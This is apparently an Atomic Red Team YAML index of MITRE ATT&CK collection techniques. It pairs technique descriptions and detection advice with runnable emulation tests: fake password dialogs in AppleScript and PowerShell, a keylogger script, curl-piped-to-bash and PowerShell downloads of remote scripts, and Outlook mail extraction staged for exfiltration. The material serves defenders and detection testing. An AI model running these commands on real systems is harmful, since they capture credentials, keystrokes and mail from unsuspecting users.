+ Detection is challenging because all messages forwarded because of an auto-forwarding rule have the same presentation as a manually forwarded message. It is also possible for the user to not be aware of the addition of such an auto-forwarding rule and not suspect that their account has been compromised; email-forwarding rules alone will not affect the normal usage patterns or operations of the email account.
+
+ Auto-forwarded messages generally contain specific detectable artifacts that may be present in the header; such artifacts would be platform-specific. Examples include X-MS-Exchange-Organization-AutoForwarded set to true, X-MailFwdBy and X-Forwarded-To. The forwardingSMTPAddress parameter used in a forwarding process that is managed by administrators and not by user actions. All messages for the mailbox are forwarded to the specified SMTP address. However, unlike typical client-side rules, the message does not appear as forwarded in the mailbox; it appears as if it were sent directly to the specified destination mailbox.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2) High volumes of emails that bear the X-MS-Exchange-Organization-AutoForwarded header (indicating auto-forwarding) without a corresponding number of emails that match the appearance of a forwarded message may indicate that further investigation is needed at the administrator level rather than user-level.
+ x_mitre_data_sources:
+ - Office 365 trace logs
+ - Mail server
+ - Email gateway
+ - Authentication logs
+ - File monitoring
+ - Process monitoring
+ - Process use of network
+ x_mitre_version: '2.1'
+ atomic_tests: []
+ T1114.003:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1114.003
+ url: https://attack.mitre.org/techniques/T1114/003
+ - source_name: US-CERT TA18-068A 2018
+ url: https://www.us-cert.gov/ncas/alerts/TA18-086A
+ description: US-CERT. (2018, March 27). TA18-068A Brute Force Attacks Conducted
+ by Cyber Actors. Retrieved October 2, 2019.
+ - source_name: Microsoft Tim McMichael Exchange Mail Forwarding 2
+ url: https://blogs.technet.microsoft.com/timmcmic/2015/06/08/exchange-and-office-365-mail-forwarding-2/
+ description: McMichael, T.. (2015, June 8). Exchange and Office 365 Mail Forwarding.
+ Retrieved October 8, 2019.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Email Forwarding Rule
+ description: "Adversaries may setup email forwarding rules to collect sensitive
+ information. Adversaries may abuse email-forwarding rules to monitor the activities
+ of a victim, steal information, and further gain intelligence on the victim
+ or the victim’s organization to use as part of further exploits or operations.(Citation:
+ US-CERT TA18-068A 2018) Outlook and Outlook Web App (OWA) allow users to create
+ inbox rules for various email functions, including forwarding to a different
+ recipient. Messages can be forwarded to internal or external recipients, and
+ there are no restrictions limiting the extent of this rule. Administrators
+ may also create forwarding rules for user accounts with the same considerations
+ and outcomes.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2)
+ \n\nAny user or administrator within the organization (or adversary with valid
+ credentials) can create rules to automatically forward all received messages
+ to another recipient, forward emails to different locations based on the sender,
+ and more."
+ id: attack-pattern--7d77a07d-02fe-4e88-8bd9-e9c008c01bf0
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ modified: '2020-10-19T22:43:45.509Z'
+ created: '2020-02-19T18:54:47.103Z'
+ x_mitre_contributors:
+ - Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ x_mitre_detection: |-
+ Detection is challenging because all messages forwarded because of an auto-forwarding rule have the same presentation as a manually forwarded message. It is also possible for the user to not be aware of the addition of such an auto-forwarding rule and not suspect that their account has been compromised; email-forwarding rules alone will not affect the normal usage patterns or operations of the email account.
+
+ Auto-forwarded messages generally contain specific detectable artifacts that may be present in the header; such artifacts would be platform-specific. Examples include `X-MS-Exchange-Organization-AutoForwarded` set to true, `X-MailFwdBy` and `X-Forwarded-To`. The `forwardingSMTPAddress` parameter used in a forwarding process that is managed by administrators and not by user actions. All messages for the mailbox are forwarded to the specified SMTP address. However, unlike typical client-side rules, the message does not appear as forwarded in the mailbox; it appears as if it were sent directly to the specified destination mailbox.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2) High volumes of emails that bear the `X-MS-Exchange-Organization-AutoForwarded` header (indicating auto-forwarding) without a corresponding number of emails that match the appearance of a forwarded message may indicate that further investigation is needed at the administrator level rather than user-level.
+ x_mitre_data_sources:
+ - Process use of network
+ - Process monitoring
+ - Email gateway
+ - Mail server
+ - Office 365 trace logs
+ x_mitre_platforms:
+ - Office 365
+ - Windows
+ atomic_tests: []
+ T1056.002:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1056.002
+ url: https://attack.mitre.org/techniques/T1056/002
+ - external_id: CAPEC-659
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/659.html
+ - url: https://baesystemsai.blogspot.com/2015/06/new-mac-os-malware-exploits-mackeeper.html
+ description: Sergei Shevchenko. (2015, June 4). New Mac OS Malware Exploits
+ Mackeeper. Retrieved July 3, 2017.
+ source_name: OSX Malware Exploits MacKeeper
+ - source_name: LogRhythm Do You Trust Oct 2014
+ url: https://logrhythm.com/blog/do-you-trust-your-computer/
+ description: Foss, G. (2014, October 3). Do You Trust Your Computer?. Retrieved
+ December 17, 2018.
+ - url: https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/
+ description: Marc-Etienne M.Leveille. (2016, July 6). New OSX/Keydnap malware
+ is hungry for credentials. Retrieved July 3, 2017.
+ source_name: OSX Keydnap malware
+ - source_name: Enigma Phishing for Credentials Jan 2015
+ url: https://enigma0x3.net/2015/01/21/phishing-for-credentials-if-you-want-it-just-ask/
+ description: 'Nelson, M. (2015, January 21). Phishing for Credentials: If
+ you want it, just ask!. Retrieved December 17, 2018.'
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: GUI Input Capture
+ description: "Adversaries may mimic common operating system GUI components to
+ prompt users for credentials with a seemingly legitimate prompt. When programs
+ are executed that need additional privileges than are present in the current
+ user context, it is common for the operating system to prompt the user for
+ proper credentials to authorize the elevated privileges for the task (ex:
+ [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)).\n\nAdversaries
+ may mimic this functionality to prompt users for credentials with a seemingly
+ legitimate prompt for a number of reasons that mimic normal usage, such as
+ a fake installer requiring additional access or a fake malware removal suite.(Citation:
+ OSX Malware Exploits MacKeeper) This type of prompt can be used to collect
+ credentials via various languages such as AppleScript(Citation: LogRhythm
+ Do You Trust Oct 2014)(Citation: OSX Keydnap malware) and PowerShell(Citation:
+ LogRhythm Do You Trust Oct 2014)(Citation: Enigma Phishing for Credentials
+ Jan 2015). "
+ id: attack-pattern--a2029942-0a85-4947-b23c-ca434698171d
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ modified: '2020-03-24T20:56:14.853Z'
+ created: '2020-02-11T18:58:45.908Z'
+ x_mitre_contributors:
+ - Matthew Molyett, @s1air, Cisco Talos
+ x_mitre_data_sources:
+ - PowerShell logs
+ - User interface
+ - Process command-line parameters
+ - Process monitoring
+ x_mitre_permissions_required:
+ - User
+ x_mitre_detection: |-
+ Monitor process execution for unusual programs as well as malicious instances of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) that could be used to prompt users for credentials.
+
+ Inspect and scrutinize input prompts for indicators of illegitimacy, such as non-traditional banners, text, timing, and/or sources.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - macOS
+ - Windows
+ identifier: T1056.002
+ atomic_tests:
+ - name: AppleScript - Prompt User for Password
+ auto_generated_guid: 76628574-0bc1-4646-8fe2-8f4427b47d15
+ description: |
+ Prompt User for Password (Local Phishing)
+ Reference: http://fuzzynop.blogspot.com/2014/10/osascript-for-local-phishing.html
+ supported_platforms:
+ - macos
+ executor:
+ command: 'osascript -e ''tell app "System Preferences" to activate'' -e ''tell
+ app "System Preferences" to activate'' -e ''tell app "System Preferences"
+ to display dialog "Software Update requires that you type your password
+ to apply changes." & return & return default answer "" with icon 1 with
+ hidden answer with title "Software Update"''
+
+'
+ name: bash
+ - name: PowerShell - Prompt User for Password
+ auto_generated_guid: 2b162bfd-0928-4d4c-9ec3-4d9f88374b52
+ description: |
+ Prompt User for Password (Local Phishing) as seen in Stitch RAT. Upon execution, a window will appear for the user to enter their credentials.
+
+ Reference: https://github.com/nathanlopez/Stitch/blob/master/PyLib/askpass.py
+ supported_platforms:
+ - windows
+ executor:
+ command: "# Creates GUI to prompt for password. Expect long pause before prompt
+ is available. \n$cred = $host.UI.PromptForCredential('Windows Security
+ Update', '',[Environment]::UserName, [Environment]::UserDomainName)\n# Using
+ write-warning to allow message to show on console as echo and other similar
+ commands are not visable from the Invoke-AtomicTest framework.\nwrite-warning
+ $cred.GetNetworkCredential().Password\n"
+ name: powershell
+ T1056:
+ technique:
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1056
+ url: https://attack.mitre.org/techniques/T1056
+ - external_id: CAPEC-569
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/569.html
+ - url: http://opensecuritytraining.info/Keylogging_files/The%20Adventures%20of%20a%20Keystroke.pdf
+ description: 'Tinaztepe, E. (n.d.). The Adventures of a Keystroke: An in-depth
+ look into keyloggers on Windows. Retrieved April 27, 2016.'
+ source_name: Adventures of a Keystroke
+ description: Adversaries may use methods of capturing user input to obtain credentials
+ or collect information. During normal system usage, users often provide credentials
+ to various different locations, such as login pages/portals or system dialog
+ boxes. Input capture mechanisms may be transparent to the user (e.g. [Credential
+ API Hooking](https://attack.mitre.org/techniques/T1056/004)) or rely on deceiving
+ the user into providing input into what they believe to be a genuine service
+ (e.g. [Web Portal Capture](https://attack.mitre.org/techniques/T1056/003)).
+ name: Input Capture
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ id: attack-pattern--bb5a00de-e086-4859-a231-fa793f6797e2
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ modified: '2020-10-21T01:31:35.760Z'
+ created: '2017-05-31T21:30:48.323Z'
+ x_mitre_version: '1.2'
+ x_mitre_contributors:
+ - John Lambert, Microsoft Threat Intelligence Center
+ x_mitre_data_sources:
+ - Windows Registry
+ - Windows event logs
+ - User interface
+ - Process command-line parameters
+ - Process monitoring
+ - PowerShell logs
+ - Loaded DLLs
+ - Kernel drivers
+ - DLL monitoring
+ - Binary file metadata
+ - API monitoring
+ x_mitre_detection: 'Detection may vary depending on how input is captured but
+ may include monitoring for certain Windows API calls (e.g. `SetWindowsHook`,
+ `GetKeyState`, and `GetAsyncKeyState`)(Citation: Adventures of a Keystroke),
+ monitoring for malicious instances of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059),
+ and ensuring no unauthorized drivers or kernel modules that could indicate
+ keylogging or API hooking are present.'
+ x_mitre_permissions_required:
+ - Administrator
+ - SYSTEM
+ - root
+ - User
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ - Network
+ x_mitre_is_subtechnique: false
+ atomic_tests: []
+ T1056.001:
+ technique:
+ id: attack-pattern--09a60ea3-a8d1-4ae5-976e-5783248b72a4
+ description: "Adversaries may log user keystrokes to intercept credentials as
+ the user types them. Keylogging is likely to be used to acquire credentials
+ for new access opportunities when [OS Credential Dumping](https://attack.mitre.org/techniques/T1003)
+ efforts are not effective, and may require an adversary to intercept keystrokes
+ on a system for a substantial period of time before credentials can be successfully
+ captured.\n\nKeylogging is the most prevalent type of input capture, with
+ many different ways of intercepting keystrokes.(Citation: Adventures of a
+ Keystroke) Some methods include:\n\n* Hooking API callbacks used for processing
+ keystrokes. Unlike [Credential API Hooking](https://attack.mitre.org/techniques/T1056/004),
+ this focuses solely on API functions intended for processing keystroke data.\n*
+ Reading raw keystroke data from the hardware buffer.\n* Windows Registry modifications.\n*
+ Custom drivers.\n* [Modify System Image](https://attack.mitre.org/techniques/T1601)
+ may provide adversaries with hooks into the operating system of network devices
+ to read raw keystrokes for login sessions.(Citation: Cisco Blog Legacy Device
+ Attacks) "
+ name: Keylogging
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1056.001
+ url: https://attack.mitre.org/techniques/T1056/001
+ - external_id: CAPEC-568
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/568.html
+ - url: http://opensecuritytraining.info/Keylogging_files/The%20Adventures%20of%20a%20Keystroke.pdf
+ description: 'Tinaztepe, E. (n.d.). The Adventures of a Keystroke: An in-depth
+ look into keyloggers on Windows. Retrieved April 27, 2016.'
+ source_name: Adventures of a Keystroke
+ - source_name: Cisco Blog Legacy Device Attacks
+ url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
+ description: Omar Santos. (2020, October 19). Attackers Continue to Target
+ Legacy Devices. Retrieved October 20, 2020.
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ modified: '2020-10-21T01:30:56.227Z'
+ created: '2020-02-11T18:58:11.791Z'
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
+ - Network
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.1'
+ x_mitre_detection: 'Keyloggers may take many forms, possibly involving modification
+ to the Registry and installation of a driver, setting a hook, or polling to
+ intercept keystrokes. Commonly used API calls include `SetWindowsHook`, `GetKeyState`,
+ and `GetAsyncKeyState`.(Citation: Adventures of a Keystroke) Monitor the Registry
+ and file system for such changes, monitor driver installs, and look for common
+ keylogging API calls. API calls alone are not an indicator of keylogging,
+ but may provide behavioral data that is useful when combined with other information
+ such as new files written to disk and unusual processes.'
+ x_mitre_permissions_required:
+ - Administrator
+ - root
+ - SYSTEM
+ - User
+ x_mitre_data_sources:
+ - Windows Registry
+ - Process monitoring
+ - API monitoring
+ identifier: T1056.001
+ atomic_tests:
+ - name: Input Capture
+ auto_generated_guid: d9b633ca-8efb-45e6-b838-70f595c6ae26
+ description: |
+ Utilize PowerShell and external resource to capture keystrokes
+ [Payload](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/src/Get-Keystrokes.ps1)
+ Provided by [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-Keystrokes.ps1)
+
+ Upon successful execution, Powershell will execute `Get-Keystrokes.ps1` and output to key.log.
+ supported_platforms:
+ - windows
+ input_arguments:
+ filepath:
+ description: Name of the local file, include path.
+ type: Path
+ default: "$env:TEMP\\key.log"
+ executor:
+ command: |
+ Set-Location $PathToAtomicsFolder
+ .\T1056.001\src\Get-Keystrokes.ps1 -LogPath #{filepath}
+ cleanup_command: 'Remove-Item $env:TEMP\key.log -ErrorAction Ignore
+
+'
+ name: powershell
+ elevation_required: true
+ T1557.001:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1557.001
+ url: https://attack.mitre.org/techniques/T1557/001
+ - url: https://en.wikipedia.org/wiki/Link-Local_Multicast_Name_Resolution
+ description: Wikipedia. (2016, July 7). Link-Local Multicast Name Resolution.
+ Retrieved November 17, 2017.
+ source_name: Wikipedia LLMNR
+ - url: https://technet.microsoft.com/library/cc958811.aspx
+ description: Microsoft. (n.d.). NetBIOS Name Resolution. Retrieved November
+ 17, 2017.
+ source_name: TechNet NetBIOS
+ - source_name: byt3bl33d3r NTLM Relaying
+ url: https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html
+ description: Salvati, M. (2017, June 2). Practical guide to NTLM Relaying
+ in 2017 (A.K.A getting a foothold in under 5 minutes). Retrieved February
+ 7, 2019.
+ - source_name: Secure Ideas SMB Relay
+ url: https://blog.secureideas.com/2018/04/ever-run-a-relay-why-smb-relays-should-be-on-your-mind.html
+ description: Kuehn, E. (2018, April 11). Ever Run a Relay? Why SMB Relays
+ Should Be On Your Mind. Retrieved February 7, 2019.
+ - url: https://github.com/nomex/nbnspoof
+ description: Nomex. (2014, February 7). NBNSpoof. Retrieved November 17, 2017.
+ source_name: GitHub NBNSpoof
+ - url: https://www.rapid7.com/db/modules/auxiliary/spoof/llmnr/llmnr_response
+ description: Francois, R. (n.d.). LLMNR Spoofer. Retrieved November 17, 2017.
+ source_name: Rapid7 LLMNR Spoofer
+ - url: https://github.com/SpiderLabs/Responder
+ description: Gaffie, L. (2016, August 25). Responder. Retrieved November 17,
+ 2017.
+ source_name: GitHub Responder
+ - url: https://www.sternsecurity.com/blog/local-network-attacks-llmnr-and-nbt-ns-poisoning
+ description: 'Sternstein, J. (2013, November). Local Network Attacks: LLMNR
+ and NBT-NS Poisoning. Retrieved November 17, 2017.'
+ source_name: Sternsecurity LLMNR-NBTNS
+ - url: https://github.com/Kevin-Robertson/Conveigh
+ description: Robertson, K. (2016, August 28). Conveigh. Retrieved November
+ 17, 2017.
+ source_name: GitHub Conveigh
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: LLMNR/NBT-NS Poisoning and SMB Relay
+ description: "By responding to LLMNR/NBT-NS network traffic, adversaries may
+ spoof an authoritative source for name resolution to force communication with
+ an adversary controlled system. This activity may be used to collect or relay
+ authentication materials. \n\nLink-Local Multicast Name Resolution (LLMNR)
+ and NetBIOS Name Service (NBT-NS) are Microsoft Windows components that serve
+ as alternate methods of host identification. LLMNR is based upon the Domain
+ Name System (DNS) format and allows hosts on the same local link to perform
+ name resolution for other hosts. NBT-NS identifies systems on a local network
+ by their NetBIOS name. (Citation: Wikipedia LLMNR) (Citation: TechNet NetBIOS)\n\nAdversaries
+ can spoof an authoritative source for name resolution on a victim network
+ by responding to LLMNR (UDP 5355)/NBT-NS (UDP 137) traffic as if they know
+ the identity of the requested host, effectively poisoning the service so that
+ the victims will communicate with the adversary controlled system. If the
+ requested host belongs to a resource that requires identification/authentication,
+ the username and NTLMv2 hash will then be sent to the adversary controlled
+ system. The adversary can then collect the hash information sent over the
+ wire through tools that monitor the ports for traffic or through [Network
+ Sniffing](https://attack.mitre.org/techniques/T1040) and crack the hashes
+ offline through [Brute Force](https://attack.mitre.org/techniques/T1110) to
+ obtain the plaintext passwords. In some cases where an adversary has access
+ to a system that is in the authentication path between systems or when automated
+ scans that use credentials attempt to authenticate to an adversary controlled
+ system, the NTLMv2 hashes can be intercepted and relayed to access and execute
+ code against a target system. The relay step can happen in conjunction with
+ poisoning but may also be independent of it. (Citation: byt3bl33d3r NTLM Relaying)(Citation:
+ Secure Ideas SMB Relay)\n\nSeveral tools exist that can be used to poison
+ name services within local networks such as NBNSpoof, Metasploit, and [Responder](https://attack.mitre.org/software/S0174).
+ (Citation: GitHub NBNSpoof) (Citation: Rapid7 LLMNR Spoofer) (Citation: GitHub
+ Responder)"
+ id: attack-pattern--650c784b-7504-4df7-ab2c-4ea882384d1e
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ modified: '2020-03-31T13:54:08.239Z'
+ created: '2020-02-11T19:08:51.677Z'
+ x_mitre_contributors:
+ - Eric Kuehn, Secure Ideas
+ - Matthew Demaske, Adaptforward
+ x_mitre_data_sources:
+ - Windows event logs
+ - Windows Registry
+ - Packet capture
+ - Netflow/Enclave netflow
+ x_mitre_permissions_required:
+ - User
+ x_mitre_detection: |-
+ Monitor HKLM\Software\Policies\Microsoft\Windows NT\DNSClient for changes to the "EnableMulticast" DWORD value. A value of “0” indicates LLMNR is disabled. (Citation: Sternsecurity LLMNR-NBTNS)
+
+ Monitor for traffic on ports UDP 5355 and UDP 137 if LLMNR/NetBIOS is disabled by security policy.
+
+ Deploy an LLMNR/NBT-NS spoofing detection tool.(Citation: GitHub Conveigh) Monitoring of Windows event logs for event IDs 4697 and 7045 may help in detecting successful relay techniques.(Citation: Secure Ideas SMB Relay)
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ atomic_tests: []
+ T1074.001:
+ technique:
+ created: '2020-03-13T21:13:10.467Z'
+ modified: '2020-05-26T19:23:54.854Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ type: attack-pattern
+ id: attack-pattern--1c34f7aa-9341-4a48-bfab-af22e51aca6c
+ description: Adversaries may stage collected data in a central location or directory
+ on the local system prior to Exfiltration. Data may be kept in separate files
+ or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560).
+ Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106)
+ and bash may be used to copy data into a staging location.
+ name: Local Data Staging
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1074.001
+ url: https://attack.mitre.org/techniques/T1074/001
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - Process monitoring
+ - File monitoring
+ x_mitre_detection: |-
+ Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
+
+ Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
+ identifier: T1074.001
+ atomic_tests:
+ - name: Stage data from Discovery.bat
+ auto_generated_guid: 107706a5-6f9f-451a-adae-bab8c667829f
+ description: |
+ Utilize powershell to download discovery.bat and save to a local file. This emulates an attacker downloading data collection tools onto the host. Upon execution,
+ verify that the file is saved in the temp directory.
+ supported_platforms:
+ - windows
+ input_arguments:
+ output_file:
+ description: Location to save downloaded discovery.bat file
+ type: Path
+ default: "$env:TEMP\\discovery.bat"
+ executor:
+ command: 'Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.bat"
+ -OutFile #{output_file}
+
+'
+ cleanup_command: 'Remove-Item -Force #{output_file} -ErrorAction Ignore
+
+'
+ name: powershell
+ - name: Stage data from Discovery.sh
+ auto_generated_guid: 39ce0303-ae16-4b9e-bb5b-4f53e8262066
+ description: 'Utilize curl to download discovery.sh and execute a basic information
+ gathering shell script
+
+'
+ supported_platforms:
+ - linux
+ - macos
+ input_arguments:
+ output_file:
+ description: Location to save downloaded discovery.bat file
+ type: Path
+ default: "/tmp/T1074.001_discovery.log"
+ executor:
+ command: 'curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.sh
+ | bash -s > #{output_file}
+
+'
+ name: bash
+ - name: Zip a Folder with PowerShell for Staging in Temp
+ auto_generated_guid: a57fbe4b-3440-452a-88a7-943531ac872a
+ description: |
+ Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration. Upon execution, Verify that a zipped folder named Folder_to_zip.zip
+ was placed in the temp directory.
+ supported_platforms:
+ - windows
+ input_arguments:
+ output_file:
+ description: Location to save zipped file or folder
+ type: Path
+ default: "$env:TEMP\\Folder_to_zip.zip"
+ input_file:
+ description: Location of file or folder to zip
+ type: Path
+ default: PathToAtomicsFolder\T1074.001\bin\Folder_to_zip
+ executor:
+ command: 'Compress-Archive -Path #{input_file} -DestinationPath #{output_file}
+ -Force
+
+'
+ cleanup_command: 'Remove-Item -Path #{output_file} -ErrorAction Ignore
+
+'
+ name: powershell
+ T1114.001:
+ technique:
+ created: '2020-02-19T18:46:06.098Z'
+ modified: '2020-03-24T17:59:20.983Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ type: attack-pattern
+ id: attack-pattern--1e9eb839-294b-48cc-b0d3-c45555a2a004
+ description: |-
+ Adversaries may target user email on local systems to collect sensitive information. Files containing email data can be acquired from a user’s local system, such as Outlook storage or cache files.
+
+ Outlook stores data locally in offline data files with an extension of .ost. Outlook 2010 and later supports .ost file sizes up to 50GB, while earlier versions of Outlook support up to 20GB.(Citation: Outlook File Sizes) IMAP accounts in Outlook 2013 (and earlier) and POP accounts use Outlook Data Files (.pst) as opposed to .ost, whereas IMAP accounts in Outlook 2016 (and later) use .ost files. Both types of Outlook data files are typically stored in `C:\Users\\Documents\Outlook Files` or `C:\Users\\AppData\Local\Microsoft\Outlook`.(Citation: Microsoft Outlook Files)
+ name: Local Email Collection
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1114.001
+ url: https://attack.mitre.org/techniques/T1114/001
+ - source_name: Outlook File Sizes
+ url: https://practical365.com/clients/office-365-proplus/outlook-cached-mode-ost-file-sizes/
+ description: N. O'Bryan. (2018, May 30). Managing Outlook Cached Mode and
+ OST File Sizes. Retrieved February 19, 2020.
+ - source_name: Microsoft Outlook Files
+ url: https://support.office.com/en-us/article/introduction-to-outlook-data-files-pst-and-ost-222eaf92-a995-45d9-bde2-f331f60e2790
+ description: Microsoft. (n.d.). Introduction to Outlook Data Files (.pst and
+ .ost). Retrieved February 19, 2020.
+ x_mitre_platforms:
+ - Windows
+ x_mitre_data_sources:
+ - Process monitoring
+ - File monitoring
+ - Authentication logs
+ - Mail server
+ x_mitre_detection: Monitor processes and command-line arguments for actions
+ that could be taken to gather local email files. Monitor for unusual processes
+ accessing local email files. Remote access tools with built-in features may
+ interact directly with the Windows API to gather information. Information
+ may also be acquired through Windows system management tools such as [Windows
+ Management Instrumentation](https://attack.mitre.org/techniques/T1047) and
+ [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ x_mitre_permissions_required:
+ - User
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
+ identifier: T1114.001
+ atomic_tests:
+ - name: Email Collection with PowerShell Get-Inbox
+ auto_generated_guid: 3f1b5096-0139-4736-9b78-19bcb02bb1cb
+ description: |
+ Search through local Outlook installation, extract mail, compress the contents, and saves everything to a directory for later exfiltration.
+ Successful execution will produce stdout message stating "Please be patient, this may take some time...". Upon completion, final output will be a mail.csv file.
+
+ Note: Outlook is required, but no email account necessary to produce artifacts.
+ supported_platforms:
+ - windows
+ input_arguments:
+ output_file:
+ description: Output file path
+ type: String
+ default: "$env:TEMP\\mail.csv"
+ file_path:
+ description: File path for Get-Inbox.ps1
+ type: String
+ default: PathToAtomicsFolder\T1114.001\src
+ dependency_executor_name: powershell
+ dependencies:
+ - description: 'Get-Inbox.ps1 must be located at #{file_path}
+
+'
+ prereq_command: 'if (Test-Path #{file_path}\Get-Inbox.ps1) {exit 0} else {exit
+ 1}
+
+'
+ get_prereq_command: 'Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/src/Get-Inbox.ps1"
+ -OutFile "#{file_path}\Get-Inbox.ps1"
+
+'
+ executor:
+ command: 'powershell -executionpolicy bypass -command #{file_path}\Get-Inbox.ps1
+ -file #{output_file}
+
+'
+ cleanup_command: 'Remove-Item #{output_file} -Force -ErrorAction Ignore
+
+'
+ name: powershell
+ T1185:
+ technique:
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1185
+ external_id: T1185
+ - url: https://en.wikipedia.org/wiki/Man-in-the-browser
+ description: Wikipedia. (2017, October 28). Man-in-the-browser. Retrieved
+ January 10, 2018.
+ source_name: Wikipedia Man in the Browser
+ - url: https://www.cobaltstrike.com/help-browser-pivoting
+ description: Mudge, R. (n.d.). Browser Pivoting. Retrieved January 10, 2018.
+ source_name: Cobalt Strike Browser Pivot
+ - url: https://www.icebrg.io/blog/malicious-chrome-extensions-enable-criminals-to-impact-over-half-a-million-users-and-global-businesses
+ description: De Tore, M., Warner, J. (2018, January 15). MALICIOUS CHROME
+ EXTENSIONS ENABLE CRIMINALS TO IMPACT OVER HALF A MILLION USERS AND GLOBAL
+ BUSINESSES. Retrieved January 17, 2018.
+ source_name: ICEBRG Chrome Extensions
+ - url: https://cobaltstrike.com/downloads/csmanual38.pdf
+ description: Strategic Cyber LLC. (2017, March 14). Cobalt Strike Manual.
+ Retrieved May 24, 2017.
+ source_name: cobaltstrike manual
+ description: |-
+ Adversaries can take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify behavior, and intercept information as part of various man in the browser techniques. (Citation: Wikipedia Man in the Browser)
+
+ A specific example is when an adversary injects software into a browser that allows an them to inherit cookies, HTTP sessions, and SSL client certificates of a user and use the browser as a way to pivot into an authenticated intranet. (Citation: Cobalt Strike Browser Pivot) (Citation: ICEBRG Chrome Extensions)
+
